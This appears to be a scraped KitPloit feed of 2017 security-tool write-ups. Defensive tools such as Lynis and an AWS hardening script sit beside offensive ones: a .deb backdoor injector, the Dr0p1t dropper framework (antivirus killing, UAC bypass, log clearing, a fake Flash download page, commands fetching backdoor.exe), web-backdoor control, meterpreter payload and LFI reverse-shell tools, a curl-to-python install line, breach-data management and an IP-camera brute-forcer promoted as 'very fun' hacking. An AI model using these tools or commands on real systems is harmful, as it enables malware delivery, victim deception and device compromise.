Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

AQUATONE - A Tool for Domain Flyovers

July 3, 2017, 8:30 am
$
0
0

AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can then scan the hosts for common web ports and HTTP headers, HTML bodies and screenshots can be gathered and consolidated into a report for easy analysis of the attack surface.

Installation

Dependencies
AQUATONE depends on Node.js and NPM package manager for its web page screenshotting capabilities. Follow this guide for Installation instructions.
You will also need a newer version of Ruby installed. If you plan to use AQUATONE in Kali Linux, you are already set up with this. If not, it is recommended to install Ruby with RVM.
Finally, the tool itself can be installed with the following command in a terminal:
$ gem install aquatone
IMPORTANT: AQUATONE's screenshotting capabilities depend on being run on a system with a graphical desktop environment. It is strongly recommended to install and run AQUATONE in a Kali linux virtual machine. I will not provide support or bug fixing for other systems than Kali Linux.

Usage

Discovery
The first stage of an AQUATONE assessment is the discovery stage where subdomains are discovered on the target domain using open sources, services and the more common dictionary brute force approach:
$ aquatone-discover --domain example.com
aquatone-discover will find the target's nameservers and shuffle DNS lookups between them. Should a lookup fail on the target domain's nameservers, aquatone-discover will fall back to using Google's public DNS servers to maximize discovery. The fallback DNS servers can be changed with the --fallback-nameservers option:
$ aquatone-discover --domain example.com --fallback-nameservers 87.98.175.85,5.9.49.12

Tuning
aquatone-discover will use 5 threads as default for concurrently performing DNS lookups. This provides reasonable performance but can be tuned to be more or less aggressive with the --threads option:
$ aquatone-discover --domain example.com --threads 25
Hammering a DNS server with failing lookups can potentially be picked up by intrusion detection systems, so if that is a concern for you, you can make aquatone-discover a bit more stealthy with the --sleep and --jitter options. --sleep accepts a number of seconds to sleep between each DNS lookup while --jitter accepts a percentage of the --sleep value to randomly add or subtract to or from the sleep interval in order to break the sleep pattern and make it less predictable.
$ aquatone-discover --domain example.com --sleep 5 --jitter 30
Please note that setting the --sleep option will force the thread count to one. The --jitter option will only be considered if the --sleep option has also been set.

API keys
Some of the passive collectors will require API keys or similar credentials in order to work. Setting these values can be done with the --set-key option:
$ aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ
All keys will be saved in ~/aquatone/.keys.yml.

Results
When aquatone-discover is finished, it will create a hosts.txt file in the ~/aquatone/<domain> folder, so for a scan of example.com it would be located at ~/aquatone/example.com/hosts.txt. The format will be a comma-separated list of hostnames and their IP, for example:
example.com,93.184.216.34
www.example.com,93.184.216.34
secret.example.com,93.184.216.36
cdn.example.com,192.0.2.42
...
In addition to the hosts.txt file, it will also generate a hosts.json which includes the same information but in JSON format. This format might be preferable if you want to use the information in custom scripts and tools. hosts.json will also be used by the aquatone-scan and aquatone-gather tools.
See aquatone-discover --help for more options.

Scanning
The scanning stage is where AQUATONE will enumerate the discovered hosts for open TCP ports that are commonly used for web services:
$ aquatone-scan --domain example.com
The --domain option will look for hosts.json in the domain's AQUATONE assessment directory, so in the example above it would look for ~/aquatone/example.com/hosts.json. This file should be present if aquatone-discover --domain example.com has been run previously.

Ports
By default, aquatone-scan will scan the following TCP ports: 80, 443, 8000, 8080 and 8443. These are very common ports for web services and will provide a reasonable coverage. Should you want to specifiy your own list of ports, you can use the --ports option:
$ aquatone-scan --domain example.com --ports 80,443,3000,8080
Instead of a comma-separated list of ports, you can also specify one of the built-in list aliases:
  • small: 80, 443
  • medium: 80, 443, 8000, 8080, 8443 (same as default)
  • large: 80, 81, 443, 591, 2082, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 55672
  • huge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5280, 5281, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8083, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8337, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 11371, 12443, 16080, 18091, 18092, 20720, 55672
Example:
$ aquatone-scan --domain example.com --ports large

Tuning
Like aquatone-discover, you can make the scanning more or less aggressive with the --threads option which accepts a number of threads for concurrent port scans. The default number of threads is 5.
$ aquatone-scan --domain example.com --threads 25
As aquatone-scan is performing port scanning, it can obviously be picked up by intrusion detection systems. While it will attempt to lessen the risk of detection by randomising hosts and ports, you can tune the stealthiness more with the --sleep and --jitter options which work just like the similarly named options for aquatone-discover. Keep in mind that setting the --sleep option will force the number of threads to one.

Results
When aquatone-scan is finished, it will create a urls.txt file in the ~/aquatone/<domain> directory, so for a scan of example.com it would be located at ~/aquatone/example.com/urls.txt. The format will be a list of URLs, for example:
http://example.com/
https://example.com/
http://www.example.com/
https://www.example.com/
http://secret.example.com:8001/
https://secret.example.com:8443/
http://cdn.example.com/
https://cdn.example.com/
...
This file can be loaded into other tools such as EyeWitness.
aquatone-scan will also generate a open_ports.txt file, which is a comma-separated list of hosts and their open ports, for example:
93.184.216.34,80,443
93.184.216.34,80
93.184.216.36,80,443,8443
192.0.2.42,80,8080
...
See aquatone-scan --help for more options.

Gathering
The final stage is the gathering part where the results of the discovery and scanning stages are used to query the discovered web services in order to retrieve and save HTTP response headers and HTML bodies, as well as taking screenshots of how the web pages look like in a web browser to make analysis easier. The screenshotting is done with the Nightmare.js Node.js library. This library will be installed automatically if it's not present in the system.
$ aquatone-gather --domain example.com
aquatone-gather will look for hosts.json and open_ports.txt in the given domain's AQUATONE assessment directory and request and screenshot every IP address for each domain name for maximum coverage.

Tuning
Like aquatone-discover and aquatone-scan, you can make the gathering more or less aggressive with the --threads option which accepts a number of threads for concurrent requests. The default number of threads is 5.
$ aquatone-gather --domain example.com --threads 25
As aquatone-gather is interacting with web services, it can be picked up by intrusion detection systems. While it will attempt to lessen the risk of detection by randomising hosts and ports, you can tune the stealthiness more with the --sleep and --jitter options which work just like the similarly named options for aquatone-discover. Keep in mind that setting the --sleep option will force the number of threads to one.

Results
When aquatone-gather is finished, it will have created several directories in the domain's AQUATONE assessment directory:
  • headers/: Contains text files with HTTP response headers from each web page
  • html/: Contains text files with HTML response bodies from each web page
  • screenshots/: Contains PNG images of how each web page looks like in a browser
  • report/ Contains report files in HTML displaying the gathered information for easy analysis

Search

PPEE (Puppy) - Professional PE file Explorer for reversers and malware researchers

July 4, 2017, 7:10 am
$
0
0


There are lots of tools out there for statically analyzing malicious binaries, but they are ordinary tools for ordinary files.
Puppy is a lightweight yet strong tool for static investigation of suspicious files. A companion plugin is also provided to query the file in the well-known malware repositories and take one-click technical information about the file such as its size, entropy, attributes, hashes, version info and so on.

Features

Puppy is robust against malformed and crafted PE files which makes it handy for reversers, malware researchers and those who want to inspect PE files in more details. All directories in a PE file including Export, Import, Resource, Exception, Certificate(Relies on Windows API), Base Relocation, Debug, TLS, Load Config, Bound Import, IAT, Delay Import, and CLR are supported.
  • Both PE32 and PE64 support
  • Examine YARA rules against opened file
  • Virustotal and OPSWAT's Metadefender query report
  • Statically analyze windows native and .Net executables
  • Robust Parsing of exe, dll, sys, scr, drv, cpl, ocx and more
  • Edit almost every data structure
  • Easily dump sections, resources and .Net assembly directories
  • Entropy and MD5 calculation of the sections and resource items
  • View strings including URL, Registry, Suspicious, ... embedded in files
  • Detect common resource types
  • Extract artifacts remained in PE file
  • Anomaly detection
  • Right-click for Copy, Search in web, Whois and dump
  • Built-in hex editor
  • Explorer context menu integration
  • Descriptive information for data members
  • Refresh, Save and Save as menu commands
  • Drag and drop support
  • List view columns can sort data in an appropriate way
  • Open file from command line
  • Checksum validation
  • Plugin enabled

Screenshots






Zeus - AWS EC2 / S3 Auditing & Hardening Tool

July 5, 2017, 7:13 am
$
0
0

Zeus is a powerful tool for AWS EC2 / S3 best hardening practices. It checks security settings according to the profiles the user creates and changes them to recommended settings based on the CIS AWS Benchmark source at request of the user.

Identity and Access Management
  • Avoid the use of the "root" account
  • Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password
  • Ensure credentials unused for 90 days or greater are disabled

Logging
  • Ensure CloudTrail is enabled in all regions
  • Ensure CloudTrail log file validation is enabled
  • Ensure the S3 bucket CloudTrail logs to is not publicly accessible
  • Ensure CloudTrail trails are integrated with CloudWatch Logs
  • Ensure AWS Config is enabled in all regions
  • Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket
  • Ensure CloudTrail logs are encrypted at rest using KMS CMKs
  • Ensure rotation for customer created CMKs is enabled

Requirements
Zeus has been written in bash script using AWS-CLI and it works in Linux/UNIX and OSX.
Make sure that the AWS-CLI tool is installed on the system and profile is configured (aws configure).

Update:
pip & aws-cli checking functions are added that based on operating system.

Screenshots


Debinject - Inject malicious code into *.debs

July 5, 2017, 2:30 pm
$
0
0

Inject malicious code into *.debs

CLONE
git clone https://github.com/UndeadSec/Debinject.git

RUNNING
cd Debinject
python debinject.py

If you have another version of Python:
python2.7 debinject.py

RUN ON TARGET SIDE
chmod 755 default.deb
dpkg -i backdoored.deb

PREREQUISITES
  • dpkg
  • dpkg-deb
  • metasploit

TESTED ON
  • Kali Linux - SANA
  • Kali Linux - ROLLING

Dr0p1t Framework 1.3 - A Framework That Creates An Advanced FUD Dropper With Some Tricks

July 6, 2017, 7:00 am
$
0
0
Have you ever heard about trojan droppers ? In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks!

Features
Generated executable properties:
  • The executable size is smaller compared to other droppers generated the same way.
  • Download executable on target system and execute it silently..
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
  • Clear event log after finishing.

Framework properties:
Modules:
  • Find and kill antivirus before running the malware.
  • The ability to disable UAC.
  • The ability to run your malware as admin.
  • Full spoof by spoofing the file icon and extension to any thing you want.
  • ZIP files support so now you can compress your executable to zip file before uploading.
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
Persistence modules:
  • Adding executable after downloading it to startup.
  • Adding executable after downloading it to task scheduler ( UAC not matters ).
  • Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.

Screenshots

On Windows

See more

On Linux (Kali linux)

See more

On OSX
Still not fully tested! Need some contributors and testers

Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Examples
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

Needed dependencies for Linux
  • apt
  • Others will be installed from install.sh file
Note : You must have root access

Needed dependencies for windows
  • pip
  • Modules in windows_requirements.txt

Installation
  • On Linux
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • On Windows (After downloading ZIP and upzip it)
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
Note : in python 2.7 you don't have pip so install it first from get-pip.py script [Google it]

Tested on:
  • Kali Linux - SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Work with Dr0p1t-Server
Note : Server is still in beta version and it have a lot of features to add and also a better design [ Need a designer to contribute :D ]

Prerequisites
  • Stable internet connection.
  • Port 5000 not used and firewall configured to not block connection from it

Installation & run server

On Linux and Windows it's the same after installing Dr0p1t by doing the steps mentioned above, install modules in server_requirements.txt by using pip like :
python -m pip install -r server_requirements.txt

Now let's run our server script :
python Dr0p1t_Server.py
After running the server script, it will start to listen to all the connection coming to port 5000 using flask.
Now to use the server from your device open in browser either 127.0.0.1:5000 or [Your IP]:5000.
To open it from other devices in LAN open [Your Local IP]:5000 and for other devices in WAN open [Your Global IP]:5000 but make sure first that you configured you router to forward port 5000 connection to you.
After opening the serve page you will see a simple website with a simple design asking you for data needed See server screenshots
Then submit the data then it will be verified through some processes then the exe file will be generated and you will be redirected to page telling you the scam link.
After entering the link you will see a scam to download the dropper which it by default Adobe flash download page. To replace the scam with yours replace the file "Scam.html" content with yours but remember the variables ( Don't remove it ).

Server screenshots





See more for WindowsSee more for Linux

*No distribute scan (Please don't scan with virus total)


Todo Check out this link


GShark Framework - Check all your backdoors with only one telegram account

July 6, 2017, 3:30 pm
$
0
0

This framework can perform web post exploitation, with this you can interact with multiple web backdoor and execute custom module, script.

Check all your backdoors with only one telegram messenger account!
  • Connect web backdoor to master server and control it with Telegram
  • Download visual backdoor on selected target
  • Execute custom module or PHP code in selected target
  • Start a multiples integrated commands in GShark
  • Generate offuscated GShark Executor backdoor
  • Configure proxy on master server for communicating to all backdoors (Proxy**)
  • Generate new backdoor source after interaction (AutoGenerate**)
  • More ...
** Configuration with /config

Networking


Steamer - Import, Search, and Manage Public Password Breach Data

July 7, 2017, 8:12 am
$
0
0

Import, manage, search public dumps.

Do you have massive amounts of CSV, .sql, .txt, that have credentials, passwords, and hashes inside? Use Steamer to manage them! Load them into a MongoDB database, and either uses the console directly or just use the handy web interface (complete with JSON export).

Install
  • Install Go and MongoDB.
  • go get gopkg.in/mgo.v2 && go get github.com/gorilla/mux
At this point, it is recommended to import one of the more simple breaches that do not require an index to import.
  • go run ./importers/adobe.go
Now we need to create relevant indexes for MongoDB:
  • In the mongo console, create indexes as:
    • memberid: hashed
    • breach: 1
    • email: 1
    • liame: 1
    • passwordhash: 1
The commands to create the indexes are:
  • mongo
  • use steamer
  • db.dumps.createIndex( { memberid: "hashed"}, { background: true} )
  • db.dumps.createIndex( { breach: 1}, { background: true} )
  • db.dumps.createIndex( { email: 1}, { background: true} )
  • db.dumps.createIndex( { liame: 1}, { background: true} )
  • db.dumps.createIndex( { passwordhash: 1}, { background: true} )
Install complete!

Running Steamer
If you're smart, you'll consider running nginx in front of go, but we're lazy, so really just run: go run ./steamer.go.

Write an importer
Copy the importers/importer-template.go file as appropriate. Fill it in with relevant code. See the other importers for examples. That template is threaded and designed for CSVs. See ./importers/linkedin2016.go for a more complex example.
If you write an importer for a public breach, please send a pull request so everyone can import it too. Please note that no public breaches are provided here in the repository itself.

Problems?
Make sure you're running MongoDB 3.0 or higher. Previous versions have had issues with indexes not working properly, and there is some new syntax which requires this version.
Performance? Try tweaking your MongoDB configuration file to turn off journaling and enabling the new database engine.


Exif-Remove - Command Line Tool- Remove Exif Data from all Digital Pictures

July 7, 2017, 3:30 pm
$
0
0

This tool is made in Python 2.7 compiled using pyinstaller for Windows OS. Nothing is special about this tool it just eases the work for me, maybe will for you too.

For what reason?
Exif is Metadata stored in hidden in your pictures. Many well-intentioned people unwittingly expose personal information that is embedded in the metadata of those digital pictures. To better protect your online confidentiality, it is crucial to remove exif data.

Changelog ( v.1.0.3 )
Tool will check if exif data is already removed ( identifies using ex_ string in filenames ) Issues fixed - Single thread worker

Installation instructions
  • Download the .zip file exif_remove.zip
  • Extract the .zip file and copy the exif.exe to C:\Windows\
  • Let's test it! Goto the directory where you have your pictures
  • Hold SHIFT KEY and click RIGHT CLICK
  • From dropdown select Open command window here
  • Write exif and press ENTER KEY
It'll regenerate the image files without exif data and save them, also auto delete the files with exif data

Search

Inspector - Privilege Escalation Unix Helper

July 8, 2017, 8:30 am
$
0
0

Inspector is a python script for help in privilege escalation, for linux environement. After starting, this script search the kernel version and check if is exploit exists, load file history bash,zsh,mysql... and load list of programs loaded with root user.

Download on server
wget https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py

Execute Inspector
python inspector.py

Or download & execute
curl https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py | python


Magic Wormhole - Get Things From One Computer To Another, Safely

July 9, 2017, 8:02 am
$
0
0

This package provides a library and a command-line tool named wormhole, which makes it possible to get arbitrary-sized files and directories (or short pieces of text) from one computer to another. The two endpoints are identified by using identical "wormhole codes": in general, the sending machine generates and displays the code, which must then be typed into the receiving machine.
The codes are short and human-pronounceable, using a phonetically-distinct wordlist. The receiving side offers tab-completion on the codewords, so usually only a few characters must be typed. Wormhole codes are single-use and do not need to be memorized.

Example
Sender:
% wormhole send README.md
Sending 7924 byte file named 'README.md'
On the other computer, please run: wormhole receive
Wormhole code is: 7-crossover-clockwork

Sending (<-10.0.1.43:58988)..
100%|=========================| 7.92K/7.92K [00:00<00:00, 6.02MB/s]
File sent.. waiting for confirmation
Confirmation received. Transfer complete.
Receiver:
% wormhole receive
Enter receive wormhole code: 7-crossover-clockwork
Receiving file (7924 bytes) into: README.md
ok? (y/n): y
Receiving (->tcp:10.0.1.43:58986)..
100%|===========================| 7.92K/7.92K [00:00<00:00, 120KB/s]
Received file written to README.md

Installation
$ pip install magic-wormhole

OS X
On OS X, you may need to install pip and run $ xcode-select --install to get GCC.
Or with homebrew:
$ brew install magic-wormhole

Linux
On Debian 9 and Ubuntu 17.04+ with apt:
$ sudo apt install magic-wormhole
On previous versions of the Debian/Ubuntu systems, or if you want to install the latest version, you may first need:
$ apt-get install python-pip build-essential python-dev libffi-dev libssl-dev
On Fedora:
$ dnf install python-pip python-devel libffi-devel openssl-devel gcc-c++ libtool redhat-rpm-config.
Note: If you get errors like fatal error: sodium.h: No such file or directory on Linux, either use SODIUM_INSTALL=bundled pip install magic-wormhole, or try installing the libsodium-dev / libsodium-devel package. These work around a bug in pynacl which gets confused when the libsodium runtime is installed (e.g. libsodium13) but not the development package.

Windows
On Windows, python2 may work better than python3. On older systems, $ pip install --upgrade pip may be necessary to get a version that can compile all the dependencies.

Motivation
  • Moving a file to a friend's machine, when the humans can speak to each other (directly) but the computers cannot
  • Delivering a properly-random password to a new user via the phone
  • Supplying an SSH public key for future login use
Copying files onto a USB stick requires physical proximity, and is uncomfortable for transferring long-term secrets because flash memory is hard to erase. Copying files with ssh/scp is fine, but requires previous arrangements and an account on the target machine, and how do you bootstrap the account? Copying files through email first requires transcribing an email address in the opposite direction, and is even worse for secrets, because email is unencrypted. Copying files through encrypted email requires bootstrapping a GPG key as well as an email address. Copying files through Dropbox is not secure against the Dropbox server and results in a large URL that must be transcribed. Using a URL shortener adds an extra step, reveals the full URL to the shortening service, and leaves a short URL that can be guessed by outsiders.
Many common use cases start with a human-mediated communication channel, such as IRC, IM, email, a phone call, or a face-to-face conversation. Some of these are basically secret, or are "secret enough" to last until the code is delivered and used. If this does not feel strong enough, users can turn on additional verification that doesn't depend upon the secrecy of the channel.
The notion of a "magic wormhole" comes from the image of two distant wizards speaking the same enchanted phrase at the same time, and causing a mystical connection to pop into existence between them. The wizards then throw books into the wormhole and they fall out the other side. Transferring files securely should be that easy.

Design
The wormhole tool uses PAKE "Password-Authenticated Key Exchange", a family of cryptographic algorithms that uses a short low-entropy password to establish a strong high-entropy shared key. This key can then be used to encrypt data. wormhole uses the SPAKE2 algorithm, due to Abdalla and Pointcheval1.
PAKE effectively trades off interaction against offline attacks. The only way for a network attacker to learn the shared key is to perform a man-in-the-middle attack during the initial connection attempt, and to correctly guess the code being used by both sides. Their chance of doing this is inversely proportional to the entropy of the wormhole code. The default is to use a 16-bit code (use --code-length= to change this), so for each use of the tool, an attacker gets a 1-in-65536 chance of success. As such, users can expect to see many error messages before the attacker has a reasonable chance of success.

Timing
The program does not have any built-in timeouts, however it is expected that both clients will be run within an hour or so of each other. This makes the tool most useful for people who are having a real-time conversation already, and want to graduate to a secure connection. Both clients must be left running until the transfer has finished.

Relays
The wormhole library requires a "Rendezvous Server": a simple WebSocket-based relay that delivers messages from one client to another. This allows the wormhole codes to omit IP addresses and port numbers. The URL of a public server is baked into the library for use as a default, and will be freely available until volume or abuse makes it infeasible to support. Applications which desire more reliability can easily run their own relay and configure their clients to use it instead. Code for the Rendezvous Server is included in the library.
The file-transfer commands also use a "Transit Relay", which is another simple server that glues together two inbound TCP connections and transfers data on each to the other. The wormhole send file mode shares the IP addresses of each client with the other (inside the encrypted message), and both clients first attempt to connect directly. If this fails, they fall back to using the transit relay. As before, the host/port of a public server is baked into the library, and should be sufficient to handle moderate traffic.
The protocol includes provisions to deliver notices and error messages to clients: if either relay must be shut down, these channels will be used to provide information about alternatives.

CLI tool
  • wormhole send [args] --text TEXT
  • wormhole send [args] FILENAME
  • wormhole send [args] DIRNAME
  • wormhole receive [args]
Both commands accept additional arguments to influence their behavior:
  • --code-length WORDS: use more or fewer than 2 words for the code
  • --verify : print (and ask user to compare) extra verification string

Library
The wormhole module makes it possible for other applications to use these code-protected channels. This includes Twisted support, and (in the future) will include blocking/synchronous support too. See docs/api.md for details.
The file-transfer tools use a second module named wormhole.transit, which provides an encrypted record-pipe. It knows how to use the Transit Relay as well as direct connections, and attempts them all in parallel. TransitSender and TransitReceiver are distinct, although once the connection is established, data can flow in either direction. All data is encrypted (using nacl/libsodium "secretbox") using a key derived from the PAKE phase. See src/wormhole/cli/cmd_send.py for examples.

Development
To set up Magic Wormhole for development, you will first need to install virtualenv.
Once you've done that, cd into the root of the repository and run:
virtualenv venv
source venv/bin/activate
pip install --upgrade pip setuptools
Now your virtualenv has been activated. You'll want to re-run source venv/bin/activate for every new terminal session you open.
To install Magic Wormhole and its development dependencies into your virtualenv, run:
pip install -e .[dev]

Running Tests
Within your virtualenv, the command-line program trial will run the test suite:
trial wormhole
This tests the entire wormhole package. If you want to run only the tests for a specific module, or even just a specific test, you can specify it instead via Python's standard dotted import notation, e.g.:
trial wormhole.test.test_cli.PregeneratedCode.test_file_tor
Developers can also just clone the source tree and run tox to run the unit tests on all supported (and installed) versions of python: 2.7, 3.4, 3.5, and 3.6.

Troubleshooting
Every so often, you might get a traceback with the following kind of error:
pkg_resources.DistributionNotFound: The 'magic-wormhole==0.9.1-268.g66e0d86.dirty' distribution was not found and is required by the application
If this happens, run pip install -e .[dev] again.


LFISuite - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner

July 10, 2017, 7:30 am
$
0
0

LFI Suite is a totally automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack, listed in the section Features.

Features
  • Works with Windows, Linux and OS X
  • Automatic Configuration
  • Automatic Update
  • Provides 8 different Local File Inclusion attack modalities:
    • /proc/self/environ
    • php://filter
    • php://input
    • /proc/self/fd
    • access log
    • phpinfo
    • data://
    • expect://
  • Provides a ninth modality, called Auto-Hack, which scans and exploits the target automatically by trying all the attacks one after the other without you having to do anything (except for providing, at the beginning, a list of paths to scan, which if you don't have you can find in this project directory in two versions, small and huge).
  • Tor proxy support
  • Reverse Shell for Windows, Linux and OS X

How to use it?
Usage is extremely simple and LFI Suite has an easy-to-use user interface; just run it and let it lead you.

Reverse Shell
When you got a LFI shell by using one of the available attacks, you can easily obtain a reverse shell by entering the command "reverseshell" (obviously you must put your system listening for the reverse connection, for instance using "nc -lvp port").

Dependencies
  • Python 2.7.x
  • Python extra modules: termcolor, requests
  • socks.py
When you run the script, in case you are missing some modules, it will check if you have pip installed and, in case you don't, it will install it automatically, then using pip it will install also the missing modules and download the necessary file socks.py.
I tried it on different operating systems (Debian,Ubuntu,Fedora,Windows 10,OS X) and it worked great, but if something strange happens to you and the automatic installation of pip and other modules fails, please install missing modules manually and re-run the script.
#f03c15IMPORTANT: In order to allow the script to install missing modules (and in case pip) automatically, you MUST run the script as root (or, at least, with sufficient permissions) the first time.

Video


Winpayloads - Undetectable Windows Payload Generation

July 11, 2017, 8:00 am
$
0
0

Winpaylods is a payload generator tool that uses metasploits meterpreter shellcode, injects the users ip and port into the shellcode and writes a python file that executes the shellcode using ctypes. This is then aes encrypted and compiled to a Windows Executable using pyinstaller.

Main features:
  • Undetectable Windows Payload Generation
  • Easy to Use Gui
  • Upload Payload to Local WebServer
  • Psexec Payload to Target Machine
  • Automatically Runs Metasploit Listener with Correct Settings after Payload Generated

Winpayloads also comes with a few features such as uac bypass and payload persistence. These are powershell files that execute on the system when the meterpreter gets a reverse shell. The uac bypass is written by PowerShellEmpire and uses an exploit to bypass uac on local administrator accounts and creates a reverse meterpreter running as local administrator back to the attackers machine.

Winpayloads can also setup a SimpleHTTPServer to put the payload on the network to allow downloading on the target machine and also has a psexec feature that will execute the payload on the target machine if supplied with usernames, domain, passwords or hashes. 

psexec.py - imacket example

Features

Getting Started
  1. git clone https://github.com/nccgroup/winpayloads.git
  2. cd winpayloads
  3. ./setup.sh will setup everything needed for Winpayloads
  4. Start Winpayloads ./Winpayloads.py
  5. Type 'help' or '?' to get a detailed help page
    setup.sh -r will reinstall

Lynis 2.5.2 - Security Auditing Tool for Unix/Linux Systems

July 11, 2017, 5:12 pm
$
0
0

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog
Upgrade note
Lynis 2.5.2 (2017-07-10)

Changes:
--------
- Support for PHP on CloudLinux
- Check for presence of locale binary
- Suhosin detection improvements
- Generic code improvements
- Changed 'lynis audit system remote' routine
- Support for macOS High Sierra
- French translation updated

Lynis Enterprise:
-----------------
- Allow 'tags' and 'system-customer-name' to be specified via Lynis client

Tests:
------
* CONT-8102 - Check for dockerd instead of docker -d
* FIRE-4594 - Check for presence Advanced Policy Firewall (APF)
* PKGS-2379 - New test for PHP suhosin extension status
* PKGS-7370 - Only use debsums on Debian
* KRNL-6000 - Added kernel.dmesg_restrict testing


Shodanwave - Explore & Obtain Information from Netwave IP Camera

July 12, 2017, 8:12 am
$
0
0

Shodanwave is a tool for exploring and obtaining information from cameras specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online but not only that.

Hack network cameras around the world, Very fun!

What does the tool to? Look, a list!
  • Search
  • Brute force
  • SSID and WPAPSK Password Disclosure
  • E-mail, FTP, DNS, MSN Password Disclosure
  • Exploit
Here is an example of shodan wave running and showing the full output...

Usage: python shodanwave.py -u usernames.txt -w passwords.txt  -k Shodan API key
       python shodanwave.py --help 
         __              __                                   
   _____/ /_  ____  ____/ /___ _____ _      ______ __   _____ 
  / ___/ __ \/ __ \/ __  / __ `/ __ \ | /| / / __ `/ | / / _ \
 (__  ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ /  __/
/____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ 


This tool is successfully connected to shodan service
Information the use of this tool is illegal, not bad.

[+] Shodan successfully Connected.
[+] Shodan Exploit Enabled.
